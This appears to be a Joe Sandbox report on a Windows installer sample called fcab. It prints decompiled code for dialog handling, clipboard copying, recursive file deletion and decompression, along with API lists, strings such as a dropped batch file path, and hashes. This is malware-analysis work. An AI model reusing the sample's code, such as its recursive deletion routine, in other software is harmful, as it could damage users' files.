				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x4291e4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405383, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						FindCloseChangeNotification(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040626E(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x4236e8;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x4291cc == _t156) {
							ShowWindow( *0x42a208, 8);
							if( *0x42a2ac == _t156) {
								_t119 =  *0x4226c0; // 0x641114
								E004052B0( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E004041BA(_t171);
							goto L25;
						}
						 *0x421eb8 = 2;
						E004041BA(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404248(_a8, _a12, _a16);
						}
						ShowWindow( *0x4291d0, _t156);
						ShowWindow(_t169, 8);
						E00404216(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a214;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x4291d0 = GetDlgItem(_a4, 0x403);
				 *0x4291c8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x4291e4 = _t134;
				_v8 = _t134;
				E00404216( *0x4291d0);
				 *0x4291d4 = E00404B4D(4);
				 *0x4291ec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004041E1(_a4);
				if(( *0x42a21c & 0x00000003) != 0) {
					ShowWindow( *0x4291d0, _t156);
					if(( *0x42a21c & 0x00000002) != 0) {
						 *0x4291d0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404216( *0x4291c8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a21c & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}



































                                                          0x004053f7
                                                          0x004053fd
                                                          0x00405407
                                                          0x0040540a
                                                          0x004055a0
                                                          0x004055bd
                                                          0x004055c4
                                                          0x004055c4
                                                          0x004055d7
                                                          0x004055f5
                                                          0x004055f7
                                                          0x004055ff
                                                          0x00405655
                                                          0x00405659
                                                          0x00000000
                                                          0x00000000
                                                          0x0040565b
                                                          0x00405661
                                                          0x00000000
                                                          0x00000000
                                                          0x0040566b
                                                          0x00405673
                                                          0x00405676
                                                          0x00405778
                                                          0x00000000
                                                          0x00405778
                                                          0x00405685
                                                          0x00405690
                                                          0x00405699
                                                          0x004056a4
                                                          0x004056a7
                                                          0x004056b0
                                                          0x004056b6
                                                          0x004056b9
                                                          0x004056b9
                                                          0x004056d1
                                                          0x004056da
                                                          0x004056dd
                                                          0x004056e4
                                                          0x004056eb
                                                          0x004056f3
                                                          0x004056f3
                                                          0x0040570a
                                                          0x0040570a
                                                          0x00405711
                                                          0x00405717
                                                          0x00405723
                                                          0x0040572a
                                                          0x00405733
                                                          0x00405735
                                                          0x00405738
                                                          0x00405747
                                                          0x0040574a
                                                          0x00405750
                                                          0x00405751
                                                          0x00405757
                                                          0x00405758
                                                          0x00405759
                                                          0x00405761
                                                          0x0040576c
                                                          0x00405772
                                                          0x00405772
                                                          0x00000000
                                                          0x004056d1
                                                          0x00405607
                                                          0x00405637
                                                          0x0040563f
                                                          0x00405641
                                                          0x0040564a
                                                          0x0040564a
                                                          0x00405650
                                                          0x00000000
                                                          0x00405650
                                                          0x0040560b
                                                          0x00405615
                                                          0x00000000
                                                          0x004055d9
                                                          0x004055df
                                                          0x0040561a
                                                          0x00000000
                                                          0x00405623
                                                          0x004055e8
                                                          0x004055ed
                                                          0x004055f0
                                                          0x00000000
                                                          0x004055f0
                                                          0x004055d7
                                                          0x00405410
                                                          0x00405414
                                                          0x0040541c
                                                          0x00405420
                                                          0x00405423
                                                          0x00405426
                                                          0x00405429
                                                          0x0040542c
                                                          0x0040542d
                                                          0x0040542e
                                                          0x00405447
                                                          0x0040544a
                                                          0x00405454
                                                          0x00405463
                                                          0x0040546b
                                                          0x00405473
                                                          0x00405478
                                                          0x0040547b
                                                          0x00405487
                                                          0x00405490
                                                          0x00405499
                                                          0x004054bb
                                                          0x004054c1
                                                          0x004054d2
                                                          0x004054d7
                                                          0x004054e5
                                                          0x004054f3
                                                          0x004054f3
                                                          0x004054f8
                                                          0x00405506
                                                          0x00405506
                                                          0x0040550b
                                                          0x0040550e
                                                          0x00405513
                                                          0x0040551f
                                                          0x00405528
                                                          0x00405535
                                                          0x00405544
                                                          0x00405537
                                                          0x0040553c
                                                          0x0040553c
                                                          0x00405550
                                                          0x00405550
                                                          0x00405564
                                                          0x0040556d
                                                          0x00405576
                                                          0x00405586
                                                          0x00405592
                                                          0x00405592
                                                          0x00000000

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 0040544D
                                                          • GetDlgItem.USER32 ref: 0040545C
                                                          • GetClientRect.USER32 ref: 00405499
                                                          • GetSystemMetrics.USER32 ref: 004054A0
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405528
                                                          • ShowWindow.USER32(?,00000008), ref: 0040553C
                                                          • GetDlgItem.USER32 ref: 0040555D
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                                          • GetDlgItem.USER32 ref: 0040546B
                                                            • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                          • GetDlgItem.USER32 ref: 004055AF
                                                          • CreateThread.KERNELBASE ref: 004055BD
                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055C4
                                                          • ShowWindow.USER32(00000000), ref: 004055E8
                                                          • ShowWindow.USER32(?,00000008), ref: 004055ED
                                                          • ShowWindow.USER32(00000008), ref: 00405637
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                                          • CreatePopupMenu.USER32 ref: 0040567C
                                                          • AppendMenuW.USER32 ref: 00405690
                                                          • GetWindowRect.USER32 ref: 004056B0
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                                          • OpenClipboard.USER32(00000000), ref: 00405711
                                                          • EmptyClipboard.USER32 ref: 00405717
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                                          • GlobalLock.KERNEL32 ref: 0040572D
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
                                                          • CloseClipboard.USER32 ref: 00405772
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                          • String ID: {$6B
                                                          • API String ID: 4154960007-3705917127
                                                          • Opcode ID: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                                          • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                                          • Opcode Fuzzy Hash: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                                          • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040595A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 499 40595a-405980 call 405c25 502 405982-405994 DeleteFileW 499->502 503 405999-4059a0 499->503 504 405b16-405b1a 502->504 505 4059a2-4059a4 503->505 506 4059b3-4059c3 call 40624c 503->506 507 405ac4-405ac9 505->507 508 4059aa-4059ad 505->508 514 4059d2-4059d3 call 405b69 506->514 515 4059c5-4059d0 lstrcatW 506->515 507->504 510 405acb-405ace 507->510 508->506 508->507 512 405ad0-405ad6 510->512 513 405ad8-405ae0 call 40658f 510->513 512->504 513->504 523 405ae2-405af6 call 405b1d call 405912 513->523 518 4059d8-4059dc 514->518 515->518 519 4059e8-4059ee lstrcatW 518->519 520 4059de-4059e6 518->520 522 4059f3-405a0f lstrlenW FindFirstFileW 519->522 520->519 520->522 524 405a15-405a1d 522->524 525 405ab9-405abd 522->525 539 405af8-405afb 523->539 540 405b0e-405b11 call 4052b0 523->540 527 405a3d-405a51 call 40624c 524->527 528 405a1f-405a27 524->528 525->507 530 405abf 525->530 541 405a53-405a5b 527->541 542 405a68-405a73 call 405912 527->542 531 405a29-405a31 528->531 532 405a9c-405aac FindNextFileW 528->532 530->507 531->527 535 405a33-405a3b 531->535 532->524 538 405ab2-405ab3 FindClose 532->538 535->527 535->532 538->525 539->512 545 405afd-405b0c call 4052b0 call 406012 539->545 540->504 541->532 546 405a5d-405a66 call 40595a 541->546 550 405a94-405a97 call 4052b0 542->550 551 405a75-405a78 542->551 545->504 546->532 550->532 554 405a7a-405a8a call 4052b0 call 406012 551->554 555 405a8c-405a92 551->555 554->532 555->532
                                                          C-Code - Quality: 98%
                                                          			E0040595A(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405C25(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2a8 =  *0x42a2a8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040624C(0x4256f0, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405B69(_t68);
					} else {
						lstrcatW(0x4256f0, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x4256f0,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040624C(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405912(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004052B0(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2a8 =  *0x42a2a8 + 1;
										} else {
											E004052B0(0xfffffff1, _t68);
											E00406012(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040595A(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x4256f0 - 0x5c;
					if( *0x4256f0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040658F(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405B1D(_t68);
							_t38 = E00405912(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004052B0(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004052B0(0xfffffff1, _t68);
							return E00406012(_t67, _t68, 0);
						}
						L30:
						 *0x42a2a8 =  *0x42a2a8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                          0x00405964
                                                          0x00405969
                                                          0x00405972
                                                          0x00405975
                                                          0x0040597d
                                                          0x00405980
                                                          0x00405983
                                                          0x0040598b
                                                          0x0040598d
                                                          0x0040598e
                                                          0x00000000
                                                          0x0040598e
                                                          0x00405999
                                                          0x0040599c
                                                          0x0040599c
                                                          0x0040599c
                                                          0x004059a0
                                                          0x004059b3
                                                          0x004059ba
                                                          0x004059bf
                                                          0x004059c3
                                                          0x004059d3
                                                          0x004059c5
                                                          0x004059cb
                                                          0x004059cb
                                                          0x004059d8
                                                          0x004059dc
                                                          0x004059e8
                                                          0x004059ee
                                                          0x004059f3
                                                          0x004059f9
                                                          0x00405a04
                                                          0x00405a0a
                                                          0x00405a0c
                                                          0x00405a0f
                                                          0x00405ab9
                                                          0x00405ab9
                                                          0x00405abd
                                                          0x00405abf
                                                          0x00405abf
                                                          0x00405abf
                                                          0x00405abf
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a15
                                                          0x00405a15
                                                          0x00405a15
                                                          0x00405a1d
                                                          0x00405a3d
                                                          0x00405a45
                                                          0x00405a4a
                                                          0x00405a51
                                                          0x00405a6c
                                                          0x00405a71
                                                          0x00405a73
                                                          0x00405a97
                                                          0x00405a75
                                                          0x00405a75
                                                          0x00405a78
                                                          0x00405a8c
                                                          0x00405a7a
                                                          0x00405a7d
                                                          0x00405a85
                                                          0x00405a85
                                                          0x00405a78
                                                          0x00405a53
                                                          0x00405a59
                                                          0x00405a5b
                                                          0x00405a61
                                                          0x00405a61
                                                          0x00405a5b
                                                          0x00000000
                                                          0x00405a51
                                                          0x00405a1f
                                                          0x00405a27
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a29
                                                          0x00405a31
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a33
                                                          0x00405a3b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a9c
                                                          0x00405aa4
                                                          0x00405aaa
                                                          0x00405aaa
                                                          0x00405ab3
                                                          0x00000000
                                                          0x00405ab3
                                                          0x004059de
                                                          0x004059e6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004059a2
                                                          0x004059a2
                                                          0x004059a4
                                                          0x00405ac4
                                                          0x00405ac6
                                                          0x00405ac9
                                                          0x00405b1a
                                                          0x00405b1a
                                                          0x00405b1a
                                                          0x00405acb
                                                          0x00405ace
                                                          0x00405ad9
                                                          0x00405ade
                                                          0x00405ae0
                                                          0x00000000
                                                          0x00000000
                                                          0x00405ae3
                                                          0x00405aef
                                                          0x00405af4
                                                          0x00405af6
                                                          0x00000000
                                                          0x00405b11
                                                          0x00405af8
                                                          0x00405afb
                                                          0x00000000
                                                          0x00000000
                                                          0x00405b00
                                                          0x00000000
                                                          0x00405b07
                                                          0x00405ad0
                                                          0x00405ad0
                                                          0x00000000
                                                          0x00405ad0
                                                          0x004059aa
                                                          0x004059ad
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004059ad

                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00000000), ref: 00405983
                                                          • lstrcatW.KERNEL32(Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,\*.*), ref: 004059CB
                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 004059EE
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,?,?,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00000000), ref: 004059F4
                                                          • FindFirstFileW.KERNELBASE(Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,?,?,?,0040A014,?,Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,?,?,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00000000), ref: 00405A04
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                                          • FindClose.KERNEL32(00000000), ref: 00405AB3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\Public\fcab.bat" $C:\Users\user\AppData\Local\Temp\$Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri$\*.*
                                                          • API String ID: 2035342205-3606416660
                                                          • Opcode ID: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                                          • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                                          • Opcode Fuzzy Hash: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                                          • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040658F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0040658F(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426738); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426738;
			}




                                                          0x0040659a
                                                          0x004065a3
                                                          0x00000000
                                                          0x004065b0
                                                          0x004065a6
                                                          0x00000000

                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00426738,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,00405C6E,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,?,?,74D0FAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,74D0FAA0), ref: 0040659A
                                                          • FindClose.KERNEL32(00000000), ref: 004065A6
                                                          Strings
                                                          • 8gB, xrefs: 00406590
                                                          • C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp, xrefs: 0040658F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: 8gB$C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp
                                                          • API String ID: 2295610775-3110294583
                                                          • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                          • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                                          • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                          • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406956 Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E00406956() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
